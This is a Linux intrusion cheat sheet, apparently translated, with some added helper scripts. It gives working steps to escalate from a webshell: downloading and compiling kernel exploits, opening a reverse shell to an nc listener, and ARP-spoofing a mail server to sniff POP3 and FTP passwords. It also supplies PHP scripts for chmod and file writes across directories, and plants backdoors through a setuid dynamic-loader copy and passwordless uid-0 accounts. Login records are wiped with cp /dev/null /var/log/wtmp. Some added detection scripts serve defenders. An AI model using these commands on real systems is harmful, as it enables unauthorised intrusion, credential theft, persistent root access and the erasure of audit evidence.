Summary of commonly used commands for Linux intrusion

Write a PHP one-liner (webshell) and upload it as a backdoor. The one-liner itself is missing from this page, so the echo below shows only the empty quotes; the command writes the one-liner into rankuplog_time.php and cat prints it back to verify:

[jobcruit@wa64-054 rankup_log]$ echo -e "" >rankuplog_time.php
[jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php

1. On Linux, think about cross-site access first. If the webshell cannot browse into the target site's directory, run ls -la / on the command line to list the filesystem root and find it.

2. Overflow privilege escalation

python -c 'import pty; pty.spawn("/bin/sh")'

This gives an interactive shell; Python is installed by default on most systems.

Enter id:

bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$

uid=529(zeicom) means we do not have root privileges yet.

Enter uname -r to get the kernel version. Here it returns: 2.6.18-164.11.1.el5PAE

Linux privilege escalation can be roughly divided into three kinds: third-party software vulnerabilities, abuse of local trust relationships, and kernel overflows.

Find the exploit (exp) matching the kernel version. The following archives are fairly complete and the exploits can be downloaded from them:

http://tools.90sec.org/

http://sebug.net/paper/linux_exp/

http://x73.cc/bitch/exp/

http://

Enter pwd; this command displays the current directory.

Check whether a compiler is available: gcc --help

The current directory is the directory the webshell lives in; I upload 2.c there through the webshell.

Spawn a reverse shell to port 12345 of your own machine on the public Internet.

Listen on that machine first: nc -lvvp 12345

Usually this gives an interactive shell as the apache user, but sometimes the shell is not interactive. In that case run:

python -c 'import pty; pty.spawn("/bin/sh")'

cd /tmp          enter the tmp directory
mkdir Papers     create a directory named Papers (Papers is inconspicuous)
cd Papers        enter the Papers directory
pwd              confirm the current directory

Then enter the commands:

wget <exp URL>   download the exploit source
gcc -o 2 2.c     compile 2.c into an executable (for C++ sources: g++ keio.cc -o keio)
chmod +x 2       give 2 execute permission
./2              run 2 to trigger the overflow
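The steps above (check the compiler, pick a working directory, compile and run) are normally done by hand. As an added example that is not part of the original notes, the following POSIX shell script automates the pre-flight checks: it reduces a `uname -r` string to a comparable version, tests whether the running kernel falls in the range an exploit claims to cover, and picks a staging directory that is writable and not mounted noexec (a noexec /tmp is the usual reason `./2` fails with "Permission denied" even after chmod +x). The 2.6.* range and the candidate directory list are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): pre-flight checks before
# compiling and running a local exploit on the target.

# kernel_triplet RELEASE: reduce a `uname -r` string to "MAJOR MINOR PATCH",
# dropping the distribution suffix: "2.6.18-164.11.1.el5PAE" -> "2 6 18".
kernel_triplet() {
    printf '%s\n' "$1" |
        sed -n 's/^\([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2 \3/p'
}

# kernel_in_range RELEASE MIN MAX: succeed if MIN <= RELEASE <= MAX (inclusive),
# comparing only MAJOR.MINOR.PATCH. Returns 2 if any argument does not parse.
kernel_in_range() {
    set -- "$(kernel_triplet "$1")" "$(kernel_triplet "$2")" "$(kernel_triplet "$3")"
    [ -n "$1" ] && [ -n "$2" ] && [ -n "$3" ] || return 2
    # Pack each triplet into one zero-padded integer so plain -ge/-le works.
    r=$(printf '%d%03d%03d' $1)
    lo=$(printf '%d%03d%03d' $2)
    hi=$(printf '%d%03d%03d' $3)
    [ "$r" -ge "$lo" ] && [ "$r" -le "$hi" ]
}

# is_noexec PATH [MOUNTS_FILE]: succeed if the filesystem containing PATH is
# mounted noexec. Reads /proc/mounts by default; the second argument lets a
# saved copy be checked instead (used by the test).
is_noexec() {
    awk -v p="$1" '
        BEGIN { best = -1 }
        # keep the options of the longest mount point that contains the path
        $2 == p || $2 == "/" || index(p, $2 "/") == 1 {
            if (length($2) >= best) { best = length($2); opts = $4 }
        }
        END { exit ("," opts ",") ~ /,noexec,/ ? 0 : 1 }
    ' "${2:-/proc/mounts}"
}

# stage_dir: print the first candidate directory that is writable and not
# noexec, or fail. The candidate list is an assumption; adjust per target.
stage_dir() {
    for d in /tmp /var/tmp /dev/shm "${HOME:-/nonexistent}"; do
        if [ -w "$d" ] && ! is_noexec "$d"; then
            printf '%s\n' "$d"
            return 0
        fi
    done
    return 1
}

# main: print the facts the notes gather by hand, then the staging directory.
# Only runs when invoked as `sh thisfile.sh run`.
main() {
    echo "uid:     $(id -u) ($(id -un))"
    echo "kernel:  $(uname -r)"
    echo "gcc:     $(command -v gcc || echo MISSING)"
    echo "python:  $(command -v python || command -v python3 || echo MISSING)"
    if kernel_in_range "$(uname -r)" 2.6.0 2.6.99; then
        echo "kernel is in the 2.6.* series"
    fi
    echo "stage:   $(stage_dir || echo 'no writable exec dir found')"
}

if [ "${1:-}" = run ]; then main; fi
```

Only the major.minor.patch numbers are compared; the distribution suffix (-164.11.1.el5PAE) carries the vendor's backports, so a kernel inside the range can still be patched, and the reverse is also true.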

Compiling a sniffer on the box. arpsniffer.c needs libpcap and libnet, so this first attempt fails at the link step:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Install both libraries first (quote the wget URL: an unquoted & would send wget to the background):

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget 'http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0'
tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install

Then recompile arpsniffer.c:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

This time no error is reported and the build succeeds.

./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

Now start spoofing. Because the target is a server, we impersonate the gateway towards it. The network in this example: mail server 192.168.0.11, gateway 192.168.0.1, our machine 192.168.0.77. So -M is our own address, -W the gateway we impersonate, -S the server whose traffic we want, and -P the port (110, POP3):

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Watch the traffic with tcpdump in a second login session:

tcpdump -i eth0 host 192.168.0.11

If data shows up, write the capture to a file instead of the screen:

tcpdump -i eth0 host 192.168.0.11 -w pop.txt

Stop after about 10 minutes, download pop.txt with the sz command (ZMODEM) under SecureCRT, and analyse it in Ethereal (now Wireshark). Note that a -w file is raw pcap data, not text, whatever it is named, so open it in Ethereal rather than cat.
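Two things a practitioner wants around this step, shown here as an added example that is not part of the original notes. First, the spoofing host must forward the packets it intercepts, otherwise the mail server and the gateway lose connectivity and the attack is noticed at once (the ip_forward setting discussed further down). Second, this is exactly what a defender looks for: one IP address answering ARP with two different MAC addresses. The script below has a helper that turns forwarding on and verifies it, and a detector that reads `tcpdump -e -n arp` output and reports every IP claimed by more than one MAC. The sample capture lines are constructed using the addresses of the example network above; the MAC addresses are invented.

```shell
#!/bin/sh
# Added example (not from the original notes).

# enable_forwarding: turn on IPv4 forwarding so intercepted traffic still
# reaches the real gateway, and confirm the kernel accepted it. Needs root.
enable_forwarding() {
    echo 1 > /proc/sys/net/ipv4/ip_forward
    [ "$(cat /proc/sys/net/ipv4/ip_forward)" = 1 ]
}

# arp_conflicts: read `tcpdump -e -n arp` lines on stdin and print every IP
# that more than one MAC has claimed in an ARP reply, as "IP MAC1 MAC2 ...".
arp_conflicts() {
    awk '
        / Reply .* is-at / {
            for (i = 1; i <= NF; i++) {
                if ($i == "Reply") ip = $(i + 1)
                if ($i == "is-at") mac = $(i + 1)
            }
            sub(/,$/, "", mac)                  # strip the trailing comma
            if (!((ip, mac) in seen)) {         # count each IP/MAC pair once
                seen[ip, mac] = 1
                macs[ip] = macs[ip] " " mac
                n[ip]++
            }
        }
        END { for (ip in n) if (n[ip] > 1) print ip macs[ip] }
    '
}

# Constructed sample in `tcpdump -e -n arp` format: the gateway 192.168.0.1 is
# first answered by its real MAC, then by the spoofing host's MAC (invented).
SAMPLE_ARP='12:00:01.000001 00:0c:29:aa:bb:cc > 00:0c:29:11:22:33, ethertype ARP (0x0806), length 60: Reply 192.168.0.1 is-at 00:0c:29:aa:bb:cc, length 46
12:00:02.000002 00:0c:29:11:22:33 > 00:0c:29:aa:bb:cc, ethertype ARP (0x0806), length 60: Reply 192.168.0.11 is-at 00:0c:29:11:22:33, length 46
12:00:03.000003 00:0c:29:dd:ee:ff > 00:0c:29:11:22:33, ethertype ARP (0x0806), length 42: Reply 192.168.0.1 is-at 00:0c:29:dd:ee:ff, length 28
12:00:04.000004 00:0c:29:dd:ee:ff > 00:0c:29:11:22:33, ethertype ARP (0x0806), length 42: Reply 192.168.0.1 is-at 00:0c:29:dd:ee:ff, length 28'

# Live use on a monitoring host (root):  tcpdump -i eth0 -e -n -l arp | arp_conflicts
# Demo on the constructed sample:        sh thisfile.sh run
if [ "${1:-}" = run ]; then
    printf '%s\n' "$SAMPLE_ARP" | arp_conflicts
fi
```

The detector keys on ARP replies only; gratuitous ARP and unsolicited replies from the spoofer show up the same way, which is the point. A switch's port-security or DAI feature does the same check in hardware.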

Now linsniffer can be used to capture the usernames and passwords we want.

First edit linsniffer.c so that it watches the ports of the applications you care about. Mine is as follows:

if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh, added for comparison only; comment out if not wanted */
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppassd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
                 from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

Ignore the warning and run the compiled linsniffer directly:

[root@bbs111 root]# ./linsniffer

Captured usernames and passwords are saved automatically in tcp.log. Port 22 is only there for comparison: SSH traffic is encrypted, so nothing useful is recovered from it.

3. Using cross-site code

Cross-directory access code for Linux when privilege escalation is not possible.

Linux permissions tend to be looser, but some virtual hosts still cannot be accessed across directories.

If you cannot escalate privileges, try the following code. If you are lucky it crosses over. Note that PHP's chmod() only succeeds on files owned by the user PHP runs as (normally the web server account), which is exactly the situation on shared hosts where every site runs under the same user.

The code is as follows:

<?php
$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if ($ok == true)
    echo 'CHMOD OK. Permission editable file or directory. Permission to write.';
?>

Save the above code as tmdsb.php.

Then request http://<target>/tmdsb.php?path=../../<directory to cross into>/index.php

Here index.php is the file whose permissions are to be modified.

Another exp collected:

Save the following code as exp.php. It appends the POSTed mess text to the POSTed filename, which works once the target file is writable:

<?php
@$filename = stripslashes($_POST['filename']);
@$mess = stripslashes($_POST['mess']);
$fp = @fopen($filename, 'a');
@fputs($fp, $mess);
@fclose($fp);
?>

4. 2.6.18 Linux kernel

udev privilege escalation

A modified udev privilege escalation, applicable to the 2.6.* kernel range. (The file names below, pwnkernel.c, wunderbar_emporium.sh and exploit.c, are those of the wunderbar_emporium package for the sock_sendpage kernel bug (CVE-2009-2692) rather than of a udev exploit; check which package you actually uploaded against the target's kernel.)

As before, upload the files to the directory where the server shell lives, run ls to confirm they are there, then give the exploit execute permission:

chmod +x pwnkernel.c
chmod +x wunderbar_emporium.sh
chmod +x exploit.c

Then run the overflow: ./w* (the glob expands to ./wunderbar_emporium.sh).

Successful overflow, root privileges.

After that, leave a backdoor. Adding a root user is one option (useradd -o -u 0 username); a setuid copy of the dynamic loader is another. Enter the commands one by one:

cd /tmp
sh-3.1# ls /lib/ld-linux*
/lib/ld-linux.so.2
sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven
sh-3.1# ls -l .str1ven
-rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven
sh-3.1# chmod +s .str1ven
sh-3.1# ls -l .str1ven
-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven

The backdoor is in place. Exit the root shell and, as the ordinary user, run ./.str1ven $(which whoami): the setuid loader executes the program named on its command line with root privileges, so whoami prints root. This only works where /tmp is not mounted nosuid, and a setuid copy of ld-linux.so.2 in /tmp is trivial to spot with find / -perm -4000 -type f.

cat /etc/passwd                                  list Linux users
cat /etc/shadow                                  password hashes; requires root
cat /etc/sysconfig/network-scripts/ifcfg-ethN    N is the interface number; shows that interface's IP configuration
ifconfig                                         show local IP information
cat /etc/resolv.conf                             show DNS settings
bash -i                                          in a reverse shell, gives an interactive prompt so commands and their output are easier to follow

Bash prompt: when you log in as an ordinary user with limited rights the prompt usually ends in $ (bash$); when you are root it ends in # (bash#).

Environment variables: try echo "$USER / $EUID" and the shell tells you which user it thinks you are.

echo 1 > /proc/sys/net/ipv4/if_forward is a typo; it should be echo 1 > /proc/sys/net/ipv4/ip_forward. The default is 0, meaning the kernel does not forward packets between interfaces; set it to 1 and the kernel forwards them. This is required during the ARP spoofing above, otherwise the victim's traffic dies at our machine. Use echo or sysctl -w net.ipv4.ip_forward=1 rather than opening the file in vim; /proc entries are not ordinary files. The setting is lost on reboot unless it is also put in /etc/sysctl.conf.

netstat -an | grep LISTEN | grep :80             see whether port 80 is listening
service --status-all | grep running
service --status-all | grep http                  list running services
lsb_release -a                                    show the distribution version

Restart the ssh service (the sshd binary itself does not take stop/start arguments; use the init script):

/etc/init.d/sshd restart
or: service sshd restart

In the sshd_config file, change

PasswordAuthentication no

to

PasswordAuthentication yes

otherwise remote ssh logins with a password are refused with "Access denied". Also check UsePAM: with UsePAM yes, PAM handles the login (for example ssh from another Linux host to this server); if it is turned off, password logins that go through PAM stop working. Run sshd -t before restarting so that a typo in the config cannot take the service down and lock you out.
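After an edit like the one above it is worth knowing which value actually applies: sshd uses the first occurrence of a directive and ignores later duplicates, directive names are case-insensitive, a commented `#PasswordAuthentication yes` line is only a reminder of the default, and anything after a Match line applies conditionally. On a live host `sshd -T` prints the effective configuration. The following added example, which is not part of the original notes, reads a config file with those rules and reports the three settings that decide whether password and root logins are accepted; the sample config is constructed, and the restart helper is only run on request.

```shell
#!/bin/sh
# Added example (not from the original notes).

# sshd_directive FILE NAME: print the value sshd would use for NAME, or
# "unset" if the file does not set it. First non-comment occurrence wins,
# names compare case-insensitively, and parsing stops at the first Match
# line because everything after it is conditional.
sshd_directive() {
    awk -v name="$2" '
        /^[ \t]*(#|$)/ { next }                       # comments and blank lines
        tolower($1) == "match" { exit }               # conditional section begins
        tolower($1) == tolower(name) { val = $2; found = 1; exit }
        END { print (found ? val : "unset") }
    ' "$1"
}

# login_summary FILE: the settings that decide whether a password login and a
# direct root login will be accepted.
login_summary() {
    printf 'PasswordAuthentication=%s PermitRootLogin=%s UsePAM=%s\n' \
        "$(sshd_directive "$1" PasswordAuthentication)" \
        "$(sshd_directive "$1" PermitRootLogin)" \
        "$(sshd_directive "$1" UsePAM)"
}

# safe_restart [CONFIG]: syntax-check the config before restarting, so a typo
# cannot leave the host without ssh. Needs root; not run by default.
safe_restart() {
    /usr/sbin/sshd -t -f "${1:-/etc/ssh/sshd_config}" && service sshd restart
}

# Constructed sample config, not copied from any real host. The first
# PasswordAuthentication line is a comment, the second is the one that counts,
# and the later "yes" after Match only applies to user backup.
SAMPLE_SSHD_CONFIG='# constructed sample
#PasswordAuthentication yes
PasswordAuthentication no
permitrootlogin no
UsePAM yes
PasswordAuthentication yes
Match User backup
    PasswordAuthentication yes'

# Usage: sh thisfile.sh run            (summarise the constructed sample)
#        sh thisfile.sh /etc/ssh/sshd_config   (summarise a real file)
case "${1:-}" in
    run) f=$(mktemp); printf '%s\n' "$SAMPLE_SSHD_CONFIG" > "$f"; login_summary "$f"; rm -f "$f" ;;
    "")  ;;
    *)   login_summary "$1" ;;
esac
```

The parser deliberately reports "unset" instead of guessing a default, because the built-in defaults (PermitRootLogin in particular) differ between OpenSSH versions; `sshd -T` is the authority for the running binary.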

Novice use of su

First chmod 777 /etc/passwd.
Then change the bin user's uid and gid to 0.
Then run passwd bin to set a password for bin.
Then cp /bin/bash /sbin/nologin (bin's login shell is /sbin/nologin, so replace it with a real shell; note this also hands a shell to every other nologin account on the box).
Then su - bin drops you into a root shell.

The idea: when sshd does not allow root to log in directly (PermitRootLogin no) and we do not know the root password, we log in as another uid-0 account instead. A very novice approach, and every step above already needs root, so this is persistence rather than escalation.

The same thing in commands:

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c -o local -static -Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

The nosec line in /etc/shadow has an empty password field, so the account logs in with no password at all.

Clear the login records: cp /dev/null /var/log/wtmp
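Every backdoor in the notes, the setuid loader copy and uid-0 user in section 4 as well as the bin/nosec accounts, the replaced nologin and the emptied wtmp just above, leaves a plain artifact in /etc or on disk. As an added example that is not part of the original notes, the following script checks for each of them. Every function takes the file or directory to inspect as an argument, so it runs against a live system or against an /etc copied from a forensic image; the passwd and shadow lines in the test are constructed from the entries shown in the notes.

```shell
#!/bin/sh
# Added example (not from the original notes): checks for the persistence
# tricks described in these notes.

# extra_uid0 PASSWD: accounts other than root with uid 0 (useradd -o -u 0,
# or bin edited from 1:1 to 0:1).
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# empty_passwords SHADOW: accounts whose password hash field is empty, i.e.
# that log in with no password (the "nosec::..." line).
empty_passwords() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# nologin_replaced NOLOGIN SHELL: succeed if the nologin binary is
# byte-identical to a real shell (the `cp /bin/bash /sbin/nologin` trick).
nologin_replaced() {
    cmp -s "$1" "$2"
}

# setuid_files DIR...: regular files with the setuid bit under DIR. In
# world-writable places such as /tmp there is no legitimate reason for one;
# a setuid copy of ld-linux.so.2 shows up here.
setuid_files() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null
}

# wtmp_truncated WTMP: succeed if the login record file exists but is empty,
# as after `cp /dev/null /var/log/wtmp`.
wtmp_truncated() {
    [ -f "$1" ] && [ ! -s "$1" ]
}

# Run every check against the live system; only when invoked as
# `sh thisfile.sh run` (needs root to read /etc/shadow).
main() {
    echo "== uid-0 accounts other than root"; extra_uid0 /etc/passwd
    echo "== accounts with an empty password"; empty_passwords /etc/shadow
    echo "== setuid files in temp directories"; setuid_files /tmp /var/tmp /dev/shm
    if nologin_replaced /sbin/nologin /bin/bash; then
        echo "== /sbin/nologin is a copy of /bin/bash"
    fi
    if wtmp_truncated /var/log/wtmp; then
        echo "== /var/log/wtmp has been emptied"
    fi
}

if [ "${1:-}" = run ]; then main; fi
```

An emptied wtmp is itself the signal: `last` suddenly shows no history at all, and the file's mtime tells you when it happened.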

-----

dd if=/dev/zero of=yourfile bs=10M count=10    create a 100 MB file of zeros (10 blocks of 10M)
/etc/init.d/ssh start                          start sshd, opening port 22 (the script is called sshd on Red Hat-style systems)
/etc/ssh/sshd_config                           SSH service configuration file
